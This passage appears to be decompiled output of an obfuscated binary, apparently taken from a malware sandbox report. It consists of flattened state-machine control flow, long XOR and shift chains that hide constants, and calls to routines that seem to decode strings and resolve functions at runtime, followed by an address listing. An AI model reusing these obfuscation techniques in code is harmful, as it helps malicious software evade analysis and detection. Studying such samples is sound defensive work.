                                                                                                                                                                                                                    				_v368 = _v368 + 0x40e6;
                                                                                                                                                                                                                    				_v368 = _v368 ^ 0x03008b35;
                                                                                                                                                                                                                    				_v260 = 0x7c0cc6;
                                                                                                                                                                                                                    				_v260 = _v260 * 0x13;
                                                                                                                                                                                                                    				_v260 = _v260 + 0xea06;
                                                                                                                                                                                                                    				_v260 = _v260 ^ 0x093f9454;
                                                                                                                                                                                                                    				_v148 = 0xd38dce;
                                                                                                                                                                                                                    				_v148 = _v148 + 0xffff5356;
                                                                                                                                                                                                                    				_v148 = _v148 ^ 0x00dcc4db;
                                                                                                                                                                                                                    				_v432 = 0xb3e833;
                                                                                                                                                                                                                    				_v432 = _v432 >> 0x10;
                                                                                                                                                                                                                    				_v432 = _v432 ^ 0xa9c67983;
                                                                                                                                                                                                                    				_v432 = _v432 + 0x170f;
                                                                                                                                                                                                                    				_v432 = _v432 ^ 0xa9c6402e;
                                                                                                                                                                                                                    				_v96 = 0x860ff3;
                                                                                                                                                                                                                    				_v96 = _v96 ^ 0xd6af6365;
                                                                                                                                                                                                                    				_v96 = _v96 ^ 0xd62aade3;
                                                                                                                                                                                                                    				_v104 = 0x47c2c9;
                                                                                                                                                                                                                    				_v104 = _v104 >> 5;
                                                                                                                                                                                                                    				_v104 = _v104 ^ 0x000d9141;
                                                                                                                                                                                                                    				_v252 = 0x18f886;
                                                                                                                                                                                                                    				_v252 = _v252 | 0x9a635a21;
                                                                                                                                                                                                                    				_v252 = _v252 + 0xffff590d;
                                                                                                                                                                                                                    				_v252 = _v252 ^ 0x9a74d55a;
                                                                                                                                                                                                                    				_v424 = 0x9a8621;
                                                                                                                                                                                                                    				_v424 = _v424 >> 3;
                                                                                                                                                                                                                    				_v424 = _v424 * 0x3c;
                                                                                                                                                                                                                    				_v424 = _v424 ^ 0x47f936c0;
                                                                                                                                                                                                                    				_v424 = _v424 ^ 0x437c58bd;
                                                                                                                                                                                                                    				_v304 = 0x465a48;
                                                                                                                                                                                                                    				_v304 = _v304 >> 0xa;
                                                                                                                                                                                                                    				_v304 = _v304 | 0x5fcf204f;
                                                                                                                                                                                                                    				_v304 = _v304 + 0xffffc9d5;
                                                                                                                                                                                                                    				_v304 = _v304 ^ 0x5fcc6907;
                                                                                                                                                                                                                    				_v292 = 0xd34c42;
                                                                                                                                                                                                                    				_v292 = _v292 + 0xcaff;
                                                                                                                                                                                                                    				_t998 = 0x2e;
                                                                                                                                                                                                                    				_v292 = _v292 / _t998;
                                                                                                                                                                                                                    				_v292 = _v292 ^ 0x0007a576;
                                                                                                                                                                                                                    				_v108 = 0x117ff3;
                                                                                                                                                                                                                    				_v108 = _v108 + 0x71ab;
                                                                                                                                                                                                                    				_v108 = _v108 ^ 0x001a9f84;
                                                                                                                                                                                                                    				_v212 = 0x736282;
                                                                                                                                                                                                                    				_v212 = _v212 >> 0x10;
                                                                                                                                                                                                                    				_v212 = _v212 ^ 0x17de715c;
                                                                                                                                                                                                                    				_v212 = _v212 ^ 0x17db8592;
                                                                                                                                                                                                                    				_v132 = 0x32c9a0;
                                                                                                                                                                                                                    				_v132 = _v132 | 0xdd360747;
                                                                                                                                                                                                                    				_v132 = _v132 ^ 0xdd3d9350;
                                                                                                                                                                                                                    				_v112 = 0x4d3a61;
                                                                                                                                                                                                                    				_v112 = _v112 + 0x627f;
                                                                                                                                                                                                                    				_v112 = _v112 ^ 0x0046ae4c;
                                                                                                                                                                                                                    				_v360 = 0xba33fb;
                                                                                                                                                                                                                    				_v360 = _v360 << 4;
                                                                                                                                                                                                                    				_v360 = _v360 << 0xe;
                                                                                                                                                                                                                    				_t999 = 0x71;
                                                                                                                                                                                                                    				_v360 = _v360 / _t999;
                                                                                                                                                                                                                    				_v360 = _v360 ^ 0x01d35f9c;
                                                                                                                                                                                                                    				_v328 = 0xcdf73b;
                                                                                                                                                                                                                    				_t1000 = 0x35;
                                                                                                                                                                                                                    				_v328 = _v328 / _t1000;
                                                                                                                                                                                                                    				_v328 = _v328 ^ 0x0f48c4cc;
                                                                                                                                                                                                                    				_v328 = _v328 + 0xffff97a7;
                                                                                                                                                                                                                    				_v328 = _v328 ^ 0x0f4635fe;
                                                                                                                                                                                                                    				_v288 = 0x17952b;
                                                                                                                                                                                                                    				_v288 = _v288 | 0x31067493;
                                                                                                                                                                                                                    				_v288 = _v288 >> 5;
                                                                                                                                                                                                                    				_v288 = _v288 ^ 0x01811def;
                                                                                                                                                                                                                    				_v416 = 0xfc63da;
                                                                                                                                                                                                                    				_v416 = _v416 + 0xcfb8;
                                                                                                                                                                                                                    				_v416 = _v416 | 0xa8ca0c63;
                                                                                                                                                                                                                    				_t1001 = 0x67;
                                                                                                                                                                                                                    				_v416 = _v416 * 0x66;
                                                                                                                                                                                                                    				_v416 = _v416 ^ 0x55bd77d1;
                                                                                                                                                                                                                    				_v316 = 0xefe03c;
                                                                                                                                                                                                                    				_t551 =  &_v316; // 0xefe03c
                                                                                                                                                                                                                    				_v316 =  *_t551 * 0x50;
                                                                                                                                                                                                                    				_v316 = _v316 + 0xffffe444;
                                                                                                                                                                                                                    				_v316 = _v316 >> 0xe;
                                                                                                                                                                                                                    				_v316 = _v316 ^ 0x000a51ce;
                                                                                                                                                                                                                    				_v216 = 0xaa2921;
                                                                                                                                                                                                                    				_v216 = _v216 / _t1101;
                                                                                                                                                                                                                    				_v216 = _v216 ^ 0x8573b405;
                                                                                                                                                                                                                    				_v216 = _v216 ^ 0x85703f25;
                                                                                                                                                                                                                    				_v320 = 0xccf9df;
                                                                                                                                                                                                                    				_v320 = _v320 >> 0xd;
                                                                                                                                                                                                                    				_v320 = _v320 << 2;
                                                                                                                                                                                                                    				_v320 = _v320 >> 4;
                                                                                                                                                                                                                    				_v320 = _v320 ^ 0x000276ed;
                                                                                                                                                                                                                    				_v384 = 0x74524d;
                                                                                                                                                                                                                    				_v384 = _v384 << 0xb;
                                                                                                                                                                                                                    				_v384 = _v384 + 0x2fec;
                                                                                                                                                                                                                    				_v384 = _v384 << 4;
                                                                                                                                                                                                                    				_v384 = _v384 ^ 0x292361b8;
                                                                                                                                                                                                                    				_v344 = 0xa93d36;
                                                                                                                                                                                                                    				_v344 = _v344 + 0x1c34;
                                                                                                                                                                                                                    				_v344 = _v344 / _t1001;
                                                                                                                                                                                                                    				_v344 = _v344 | 0x08cdbec1;
                                                                                                                                                                                                                    				_v344 = _v344 ^ 0x08cf164e;
                                                                                                                                                                                                                    				_v392 = 0x9461cf;
                                                                                                                                                                                                                    				_t1002 = 0x49;
                                                                                                                                                                                                                    				_v392 = _v392 / _t1002;
                                                                                                                                                                                                                    				_v392 = _v392 | 0x6ffbfe3f;
                                                                                                                                                                                                                    				_v392 = _v392 ^ 0x6ff59aaf;
                                                                                                                                                                                                                    				_v256 = 0x2f3469;
                                                                                                                                                                                                                    				_v256 = _v256 >> 0xb;
                                                                                                                                                                                                                    				_v256 = _v256 + 0xffffdd9e;
                                                                                                                                                                                                                    				_v256 = _v256 ^ 0xfff77bfe;
                                                                                                                                                                                                                    				_v160 = 0xea713a;
                                                                                                                                                                                                                    				_t620 =  &_v160; // 0xea713a
                                                                                                                                                                                                                    				_t1003 = 0x52;
                                                                                                                                                                                                                    				_v160 =  *_t620 / _t1003;
                                                                                                                                                                                                                    				_v160 = _v160 ^ 0x0002d26e;
                                                                                                                                                                                                                    				_v168 = 0x33513a;
                                                                                                                                                                                                                    				_v168 = _v168 + 0xffff66aa;
                                                                                                                                                                                                                    				_v168 = _v168 ^ 0x003ebba1;
                                                                                                                                                                                                                    				_v444 = 0xf7ab54;
                                                                                                                                                                                                                    				_v444 = _v444 + 0x584d;
                                                                                                                                                                                                                    				_t1004 = 0x11;
                                                                                                                                                                                                                    				_v444 = _v444 * 0x23;
                                                                                                                                                                                                                    				_v444 = _v444 + 0xffff8d2d;
                                                                                                                                                                                                                    				_v444 = _v444 ^ 0x21efc6f0;
                                                                                                                                                                                                                    				_v176 = 0x26e1d6;
                                                                                                                                                                                                                    				_v176 = _v176 | 0xb8da2035;
                                                                                                                                                                                                                    				_v176 = _v176 ^ 0xb8f80e28;
                                                                                                                                                                                                                    				_v272 = 0xdb528;
                                                                                                                                                                                                                    				_v272 = _v272 + 0x390;
                                                                                                                                                                                                                    				_v272 = _v272 ^ 0x80e7d39c;
                                                                                                                                                                                                                    				_v272 = _v272 ^ 0x80ea94e6;
                                                                                                                                                                                                                    				_v184 = 0xf3abf8;
                                                                                                                                                                                                                    				_v184 = _v184 | 0x691c7266;
                                                                                                                                                                                                                    				_v184 = _v184 ^ 0x69f3c3a7;
                                                                                                                                                                                                                    				_v436 = 0x4b3e75;
                                                                                                                                                                                                                    				_v436 = _v436 | 0xa2cb047b;
                                                                                                                                                                                                                    				_v436 = _v436 / _t1004;
                                                                                                                                                                                                                    				_v436 = _v436 + 0x5139;
                                                                                                                                                                                                                    				_v436 = _v436 ^ 0x09948024;
                                                                                                                                                                                                                    				_v248 = 0x9637f1;
                                                                                                                                                                                                                    				_v248 = _v248 + 0x20ee;
                                                                                                                                                                                                                    				_v248 = _v248 | 0x5a5c863f;
                                                                                                                                                                                                                    				_v248 = _v248 ^ 0x5ad94413;
                                                                                                                                                                                                                    				_v144 = 0x1dacf4;
                                                                                                                                                                                                                    				_v144 = _v144 ^ 0x7ab3c7a4;
                                                                                                                                                                                                                    				_v144 = _v144 ^ 0x7aa2c330;
                                                                                                                                                                                                                    				_v312 = 0x3c1344;
                                                                                                                                                                                                                    				_v312 = _v312 ^ 0x4399a037;
                                                                                                                                                                                                                    				_v312 = _v312 + 0xffff1c1b;
                                                                                                                                                                                                                    				_v312 = _v312 * 0x15;
                                                                                                                                                                                                                    				_v312 = _v312 ^ 0x8c8cbd1c;
                                                                                                                                                                                                                    				_v400 = 0xc8e9a8;
                                                                                                                                                                                                                    				_v400 = _v400 >> 0xa;
                                                                                                                                                                                                                    				_v400 = _v400 + 0x8ae3;
                                                                                                                                                                                                                    				_v400 = _v400 * 0x4d;
                                                                                                                                                                                                                    				_v400 = _v400 ^ 0x00349717;
                                                                                                                                                                                                                    				_v352 = 0x7609e0;
                                                                                                                                                                                                                    				_v352 = _v352 + 0xc8e9;
                                                                                                                                                                                                                    				_v352 = _v352 ^ 0x91b01d01;
                                                                                                                                                                                                                    				_v352 = _v352 ^ 0xaace758e;
                                                                                                                                                                                                                    				_v352 = _v352 ^ 0x3b04afb7;
                                                                                                                                                                                                                    				_v408 = 0xfe5348;
                                                                                                                                                                                                                    				_v408 = _v408 + 0xe771;
                                                                                                                                                                                                                    				_v408 = _v408 + 0xffffcc0a;
                                                                                                                                                                                                                    				_v408 = _v408 + 0xc423;
                                                                                                                                                                                                                    				_v408 = _v408 ^ 0x00f102cc;
                                                                                                                                                                                                                    				_t1098 = 0x1f921aa;
                                                                                                                                                                                                                    				_v200 = 0x7d3829;
                                                                                                                                                                                                                    				_v200 = _v200 + 0x336b;
                                                                                                                                                                                                                    				_v200 = _v200 + 0xffff4a78;
                                                                                                                                                                                                                    				_v200 = _v200 ^ 0x0076c72c;
                                                                                                                                                                                                                    				_v208 = 0xccb89b;
                                                                                                                                                                                                                    				_v208 = _v208 << 0xc;
                                                                                                                                                                                                                    				_v208 = _v208 ^ 0xb0ebabe3;
                                                                                                                                                                                                                    				_v208 = _v208 ^ 0x7b682a53;
                                                                                                                                                                                                                    				_v308 = 0x8c65f2;
                                                                                                                                                                                                                    				_v308 = _v308 ^ 0xa7182864;
                                                                                                                                                                                                                    				_t1005 = 0x7f;
                                                                                                                                                                                                                    				_v308 = _v308 / _t1005;
                                                                                                                                                                                                                    				_v308 = _v308 << 5;
                                                                                                                                                                                                                    				_v308 = _v308 ^ 0x2a33fe26;
                                                                                                                                                                                                                    				_v120 = 0xed9426;
                                                                                                                                                                                                                    				_v120 = _v120 | 0xe182fd02;
                                                                                                                                                                                                                    				_v120 = _v120 ^ 0xe1e714c3;
                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                    					_t935 = 0x905d4e4;
                                                                                                                                                                                                                    					_t1006 = 0x4e3c521;
                                                                                                                                                                                                                    					_t1079 = 0x1bc9471;
                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                    							L2:
                                                                                                                                                                                                                    							_t1114 = _t982 - 0x71c6a5e;
                                                                                                                                                                                                                    							if(_t1114 > 0) {
                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							if(_t1114 == 0) {
                                                                                                                                                                                                                    								E00A76A6B( *((intOrPtr*)( *0xa83208 + 0x5c)), _v312, _v400, _v352, _v408);
                                                                                                                                                                                                                    								_t1108 =  &(_t1108[3]);
                                                                                                                                                                                                                    								_t982 = _t1098;
                                                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                                                    									L1:
                                                                                                                                                                                                                    									_t935 = 0x905d4e4;
                                                                                                                                                                                                                    									_t1006 = 0x4e3c521;
                                                                                                                                                                                                                    									_t1079 = 0x1bc9471;
                                                                                                                                                                                                                    									goto L2;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t982 == _t1079) {
                                                                                                                                                                                                                    									_push(_v304);
                                                                                                                                                                                                                    									_push(_v424);
                                                                                                                                                                                                                    									_push(_v252);
                                                                                                                                                                                                                    									__eflags = E00A7D648(_v292,  &_v84,  *0xa83208 + 0x60, _v108, 0xa614cc, E00A81E60(0xa614cc, _v104, __eflags), _v88, _v212, _v132, _v112, _v360, _v140) - _v192;
                                                                                                                                                                                                                    									_t982 =  ==  ? 0x905d4e4 : _t1098;
                                                                                                                                                                                                                    									E00A7D6DF(_v328, _t942, _v288, _v416);
                                                                                                                                                                                                                    									_t1108 =  &(_t1108[0xf]);
                                                                                                                                                                                                                    									goto L24;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									if(_t982 == _t1098) {
                                                                                                                                                                                                                    										E00A62984(_v200, _v300, _v208, _v308, _v120, _v88);
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										if(_t982 == 0x4a48a54) {
                                                                                                                                                                                                                    											_t982 = 0xd1c276d;
                                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											_t1118 = _t982 - _t1006;
                                                                                                                                                                                                                    											if(_t982 == _t1006) {
                                                                                                                                                                                                                    												_push(_v100);
                                                                                                                                                                                                                    												_push(_v228);
                                                                                                                                                                                                                    												_push(_v244);
                                                                                                                                                                                                                    												_t951 = E00A81E60(0xa6149c, _v188, _t1118);
                                                                                                                                                                                                                    												_push(_v284);
                                                                                                                                                                                                                    												_t1099 = _t951;
                                                                                                                                                                                                                    												_push(_v124);
                                                                                                                                                                                                                    												_push(_v220);
                                                                                                                                                                                                                    												_t952 = E00A81E60(0xa6157c, _v276, _t1118);
                                                                                                                                                                                                                    												_v60 = _v180;
                                                                                                                                                                                                                    												_t954 = E00A6E325(_t1099, _v268, _v448, _v236);
                                                                                                                                                                                                                    												_t1030 = 0x20;
                                                                                                                                                                                                                    												_v76 = _v76 & 0x00000000;
                                                                                                                                                                                                                    												_v84 = _t1030;
                                                                                                                                                                                                                    												_v64 = 2 + _t954 * 2;
                                                                                                                                                                                                                    												_v68 =  &_v64;
                                                                                                                                                                                                                    												_v56 = _t1099;
                                                                                                                                                                                                                    												_v72 = 1;
                                                                                                                                                                                                                    												E00A7A6F1(_v440, _v92, _v164, _v116, _t952,  &_v84, _v172, _v196, _t1030,  &_v32, _v80, _v336, _v204,  &_v76);
                                                                                                                                                                                                                    												_t982 =  ==  ? 0x1bc9471 : 0x1f921aa;
                                                                                                                                                                                                                    												E00A7D6DF(_v296, _t1099, _v368, _v260);
                                                                                                                                                                                                                    												E00A7D6DF(_v148, _t952, _v432, _v96);
                                                                                                                                                                                                                    												_t1108 =  &(_t1108[0x18]);
                                                                                                                                                                                                                    												L9:
                                                                                                                                                                                                                    												_t1098 = 0x1f921aa;
                                                                                                                                                                                                                    												L24:
                                                                                                                                                                                                                    												_t935 = 0x905d4e4;
                                                                                                                                                                                                                    												_t1006 = 0x4e3c521;
                                                                                                                                                                                                                    												_t1079 = 0x1bc9471;
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    											goto L25;
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							L28:
                                                                                                                                                                                                                    							return _t1106;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						__eflags = _t982 - _t935;
                                                                                                                                                                                                                    						if(_t982 == _t935) {
                                                                                                                                                                                                                    							_t1008 = E00A7C6D9( *((intOrPtr*)( *0xa83208 + 0x60)));
                                                                                                                                                                                                                    							 *((intOrPtr*)( *0xa83208 + 0x5c)) = _t1008;
                                                                                                                                                                                                                    							__eflags = _t1008;
                                                                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                                                                    								_t982 = _t1098;
                                                                                                                                                                                                                    								goto L24;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								_t982 = 0xe17e8b4;
                                                                                                                                                                                                                    								goto L1;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							__eflags = _t982 - 0xd1c276d;
                                                                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                                                                    								_push(_v428);
                                                                                                                                                                                                                    								_push(_v240);
                                                                                                                                                                                                                    								_push(_v232);
                                                                                                                                                                                                                    								_t965 = E00A81E60(0xa615ac, _v420, __eflags);
                                                                                                                                                                                                                    								_push(_v136);
                                                                                                                                                                                                                    								_push(_v412);
                                                                                                                                                                                                                    								_push(_v224);
                                                                                                                                                                                                                    								__eflags = E00A7EBA2(_v372, E00A81E60(0xa6146c, _v404, __eflags), _v380, _v388, _t965,  &_v88, _v396) - _v364;
                                                                                                                                                                                                                    								_t982 =  ==  ? 0x4e3c521 : 0x401a717;
                                                                                                                                                                                                                    								E00A7D6DF(_v128, _t965, _v348, _v356);
                                                                                                                                                                                                                    								E00A7D6DF(_v324, _t966, _v332, _v340);
                                                                                                                                                                                                                    								_t1108 =  &(_t1108[0xf]);
                                                                                                                                                                                                                    								goto L9;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								__eflags = _t982 - 0xe17e8b4;
                                                                                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                                                                                    									_push(_v392);
                                                                                                                                                                                                                    									_push(_v344);
                                                                                                                                                                                                                    									_push(_v384);
                                                                                                                                                                                                                    									_t1105 = E00A81E60(0xa614fc, _v320, __eflags);
                                                                                                                                                                                                                    									_v44 = _v376;
                                                                                                                                                                                                                    									_v40 = _v280;
                                                                                                                                                                                                                    									_v36 = _v452;
                                                                                                                                                                                                                    									_t980 = E00A7A27E(_v256, _v320,  &_v44, _v264, _v160, 0xa614fc, _v168, _v88, _v444, _v176,  *0xa83208 + 0x50,  *((intOrPtr*)( *0xa83208 + 0x5c)),  *((intOrPtr*)( *0xa83208 + 0x60)), _v272, _t973, _v184);
                                                                                                                                                                                                                    									_t1108 =  &(_t1108[0x11]);
                                                                                                                                                                                                                    									__eflags = _t980 - _v152;
                                                                                                                                                                                                                    									if(_t980 != _v152) {
                                                                                                                                                                                                                    										_t982 = 0x71c6a5e;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										_t982 = _t1098;
                                                                                                                                                                                                                    										_t1106 = 1;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    									E00A7D6DF(_v436, _t1105, _v248, _v144);
                                                                                                                                                                                                                    									goto L24;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							goto L25;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						goto L28;
                                                                                                                                                                                                                    						L25:
                                                                                                                                                                                                                    					} while (_t982 != 0x401a717);
                                                                                                                                                                                                                    					goto L28;
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    			}

















































































































































                                                                                                                                                                                                                    0x00a67990
                                                                                                                                                                                                                    0x00a67996
                                                                                                                                                                                                                    0x00a679a5
                                                                                                                                                                                                                    0x00a679a7
                                                                                                                                                                                                                    0x00a679ae
                                                                                                                                                                                                                    0x00a679b5
                                                                                                                                                                                                                    0x00a679ba
                                                                                                                                                                                                                    0x00a679c2
                                                                                                                                                                                                                    0x00a679ca
                                                                                                                                                                                                                    0x00a679db
                                                                                                                                                                                                                    0x00a679dc
                                                                                                                                                                                                                    0x00a679e0
                                                                                                                                                                                                                    0x00a679e8
                                                                                                                                                                                                                    0x00a679f3
                                                                                                                                                                                                                    0x00a679fb
                                                                                                                                                                                                                    0x00a67a06
                                                                                                                                                                                                                    0x00a67a11
                                                                                                                                                                                                                    0x00a67a26
                                                                                                                                                                                                                    0x00a67a29
                                                                                                                                                                                                                    0x00a67a30
                                                                                                                                                                                                                    0x00a67a3b
                                                                                                                                                                                                                    0x00a67a43
                                                                                                                                                                                                                    0x00a67a4b
                                                                                                                                                                                                                    0x00a67a53
                                                                                                                                                                                                                    0x00a67a58
                                                                                                                                                                                                                    0x00a67a60
                                                                                                                                                                                                                    0x00a67a68
                                                                                                                                                                                                                    0x00a67a70
                                                                                                                                                                                                                    0x00a67a7d
                                                                                                                                                                                                                    0x00a67a81
                                                                                                                                                                                                                    0x00a67a89
                                                                                                                                                                                                                    0x00a67a94
                                                                                                                                                                                                                    0x00a67a9f
                                                                                                                                                                                                                    0x00a67aaa
                                                                                                                                                                                                                    0x00a67abd
                                                                                                                                                                                                                    0x00a67ac4
                                                                                                                                                                                                                    0x00a67acf
                                                                                                                                                                                                                    0x00a67ada
                                                                                                                                                                                                                    0x00a67ae2
                                                                                                                                                                                                                    0x00a67aed
                                                                                                                                                                                                                    0x00a67af8
                                                                                                                                                                                                                    0x00a67b00
                                                                                                                                                                                                                    0x00a67b0b
                                                                                                                                                                                                                    0x00a67b16
                                                                                                                                                                                                                    0x00a67b29
                                                                                                                                                                                                                    0x00a67b30
                                                                                                                                                                                                                    0x00a67b3b
                                                                                                                                                                                                                    0x00a67b46
                                                                                                                                                                                                                    0x00a67b4e
                                                                                                                                                                                                                    0x00a67b59
                                                                                                                                                                                                                    0x00a67b64
                                                                                                                                                                                                                    0x00a67b6c
                                                                                                                                                                                                                    0x00a67b7c
                                                                                                                                                                                                                    0x00a67b7d
                                                                                                                                                                                                                    0x00a67b84
                                                                                                                                                                                                                    0x00a67b8f
                                                                                                                                                                                                                    0x00a67b97
                                                                                                                                                                                                                    0x00a67b9f
                                                                                                                                                                                                                    0x00a67ba7
                                                                                                                                                                                                                    0x00a67baf
                                                                                                                                                                                                                    0x00a67bb7
                                                                                                                                                                                                                    0x00a67bbf
                                                                                                                                                                                                                    0x00a67bca
                                                                                                                                                                                                                    0x00a67bd0
                                                                                                                                                                                                                    0x00a67bd8
                                                                                                                                                                                                                    0x00a67be0
                                                                                                                                                                                                                    0x00a67beb
                                                                                                                                                                                                                    0x00a67bf3
                                                                                                                                                                                                                    0x00a67bfe
                                                                                                                                                                                                                    0x00a67c09
                                                                                                                                                                                                                    0x00a67c14
                                                                                                                                                                                                                    0x00a67c1f
                                                                                                                                                                                                                    0x00a67c27
                                                                                                                                                                                                                    0x00a67c32
                                                                                                                                                                                                                    0x00a67c3a
                                                                                                                                                                                                                    0x00a67c3f
                                                                                                                                                                                                                    0x00a67c47
                                                                                                                                                                                                                    0x00a67c4f
                                                                                                                                                                                                                    0x00a67c57
                                                                                                                                                                                                                    0x00a67c5f
                                                                                                                                                                                                                    0x00a67c6a
                                                                                                                                                                                                                    0x00a67c6f
                                                                                                                                                                                                                    0x00a67c75
                                                                                                                                                                                                                    0x00a67c7d
                                                                                                                                                                                                                    0x00a67c85
                                                                                                                                                                                                                    0x00a67c90
                                                                                                                                                                                                                    0x00a67c98
                                                                                                                                                                                                                    0x00a67c9b
                                                                                                                                                                                                                    0x00a67ca2
                                                                                                                                                                                                                    0x00a67cad
                                                                                                                                                                                                                    0x00a67cb8
                                                                                                                                                                                                                    0x00a67cc8
                                                                                                                                                                                                                    0x00a67ccc
                                                                                                                                                                                                                    0x00a67cd9
                                                                                                                                                                                                                    0x00a67cdc
                                                                                                                                                                                                                    0x00a67ce0
                                                                                                                                                                                                                    0x00a67ce8
                                                                                                                                                                                                                    0x00a67cf3
                                                                                                                                                                                                                    0x00a67cfb
                                                                                                                                                                                                                    0x00a67d06
                                                                                                                                                                                                                    0x00a67d0e
                                                                                                                                                                                                                    0x00a67d16
                                                                                                                                                                                                                    0x00a67d1e
                                                                                                                                                                                                                    0x00a67d26
                                                                                                                                                                                                                    0x00a67d2e
                                                                                                                                                                                                                    0x00a67d36
                                                                                                                                                                                                                    0x00a67d3e
                                                                                                                                                                                                                    0x00a67d4e
                                                                                                                                                                                                                    0x00a67d52
                                                                                                                                                                                                                    0x00a67d5a
                                                                                                                                                                                                                    0x00a67d67
                                                                                                                                                                                                                    0x00a67d68
                                                                                                                                                                                                                    0x00a67d6c
                                                                                                                                                                                                                    0x00a67d71
                                                                                                                                                                                                                    0x00a67d79
                                                                                                                                                                                                                    0x00a67d81
                                                                                                                                                                                                                    0x00a67d8c
                                                                                                                                                                                                                    0x00a67d94
                                                                                                                                                                                                                    0x00a67d9f
                                                                                                                                                                                                                    0x00a67dad
                                                                                                                                                                                                                    0x00a67db1
                                                                                                                                                                                                                    0x00a67db9
                                                                                                                                                                                                                    0x00a67dbe
                                                                                                                                                                                                                    0x00a67dc6
                                                                                                                                                                                                                    0x00a67dce
                                                                                                                                                                                                                    0x00a67dde
                                                                                                                                                                                                                    0x00a67de3
                                                                                                                                                                                                                    0x00a67de9
                                                                                                                                                                                                                    0x00a67df1
                                                                                                                                                                                                                    0x00a67df9
                                                                                                                                                                                                                    0x00a67e04
                                                                                                                                                                                                                    0x00a67e17
                                                                                                                                                                                                                    0x00a67e1a
                                                                                                                                                                                                                    0x00a67e21
                                                                                                                                                                                                                    0x00a67e2c
                                                                                                                                                                                                                    0x00a67e37
                                                                                                                                                                                                                    0x00a67e42
                                                                                                                                                                                                                    0x00a67e4d
                                                                                                                                                                                                                    0x00a67e60
                                                                                                                                                                                                                    0x00a67e67
                                                                                                                                                                                                                    0x00a67e72
                                                                                                                                                                                                                    0x00a67e7d
                                                                                                                                                                                                                    0x00a67e88
                                                                                                                                                                                                                    0x00a67e90
                                                                                                                                                                                                                    0x00a67e98
                                                                                                                                                                                                                    0x00a67ea3
                                                                                                                                                                                                                    0x00a67eae
                                                                                                                                                                                                                    0x00a67eb6
                                                                                                                                                                                                                    0x00a67ec1
                                                                                                                                                                                                                    0x00a67ecc
                                                                                                                                                                                                                    0x00a67ed7
                                                                                                                                                                                                                    0x00a67edf
                                                                                                                                                                                                                    0x00a67eea
                                                                                                                                                                                                                    0x00a67ef5
                                                                                                                                                                                                                    0x00a67f00
                                                                                                                                                                                                                    0x00a67f08
                                                                                                                                                                                                                    0x00a67f13
                                                                                                                                                                                                                    0x00a67f26
                                                                                                                                                                                                                    0x00a67f2d
                                                                                                                                                                                                                    0x00a67f38
                                                                                                                                                                                                                    0x00a67f43
                                                                                                                                                                                                                    0x00a67f4b
                                                                                                                                                                                                                    0x00a67f56
                                                                                                                                                                                                                    0x00a67f61
                                                                                                                                                                                                                    0x00a67f6c
                                                                                                                                                                                                                    0x00a67f74
                                                                                                                                                                                                                    0x00a67f7f
                                                                                                                                                                                                                    0x00a67f8a
                                                                                                                                                                                                                    0x00a67f95
                                                                                                                                                                                                                    0x00a67fa0
                                                                                                                                                                                                                    0x00a67fab
                                                                                                                                                                                                                    0x00a67fb6
                                                                                                                                                                                                                    0x00a67fc1
                                                                                                                                                                                                                    0x00a67fc9
                                                                                                                                                                                                                    0x00a67fd4
                                                                                                                                                                                                                    0x00a67fea
                                                                                                                                                                                                                    0x00a67ff8
                                                                                                                                                                                                                    0x00a67ffd
                                                                                                                                                                                                                    0x00a68006
                                                                                                                                                                                                                    0x00a68011
                                                                                                                                                                                                                    0x00a68019
                                                                                                                                                                                                                    0x00a6801e
                                                                                                                                                                                                                    0x00a68028
                                                                                                                                                                                                                    0x00a68029
                                                                                                                                                                                                                    0x00a6802d
                                                                                                                                                                                                                    0x00a68035
                                                                                                                                                                                                                    0x00a68049
                                                                                                                                                                                                                    0x00a6805c
                                                                                                                                                                                                                    0x00a6805d
                                                                                                                                                                                                                    0x00a68064
                                                                                                                                                                                                                    0x00a6806f
                                                                                                                                                                                                                    0x00a68077
                                                                                                                                                                                                                    0x00a6807c
                                                                                                                                                                                                                    0x00a6808c
                                                                                                                                                                                                                    0x00a68090
                                                                                                                                                                                                                    0x00a68098
                                                                                                                                                                                                                    0x00a680a3
                                                                                                                                                                                                                    0x00a680ae
                                                                                                                                                                                                                    0x00a680b9
                                                                                                                                                                                                                    0x00a680c4
                                                                                                                                                                                                                    0x00a680cc
                                                                                                                                                                                                                    0x00a680d7
                                                                                                                                                                                                                    0x00a680e2
                                                                                                                                                                                                                    0x00a680ed
                                                                                                                                                                                                                    0x00a680f8
                                                                                                                                                                                                                    0x00a68103
                                                                                                                                                                                                                    0x00a6810e
                                                                                                                                                                                                                    0x00a68119
                                                                                                                                                                                                                    0x00a68124
                                                                                                                                                                                                                    0x00a6812c
                                                                                                                                                                                                                    0x00a68134
                                                                                                                                                                                                                    0x00a6813c
                                                                                                                                                                                                                    0x00a68147
                                                                                                                                                                                                                    0x00a68152
                                                                                                                                                                                                                    0x00a6815d
                                                                                                                                                                                                                    0x00a68168
                                                                                                                                                                                                                    0x00a68173
                                                                                                                                                                                                                    0x00a6817e
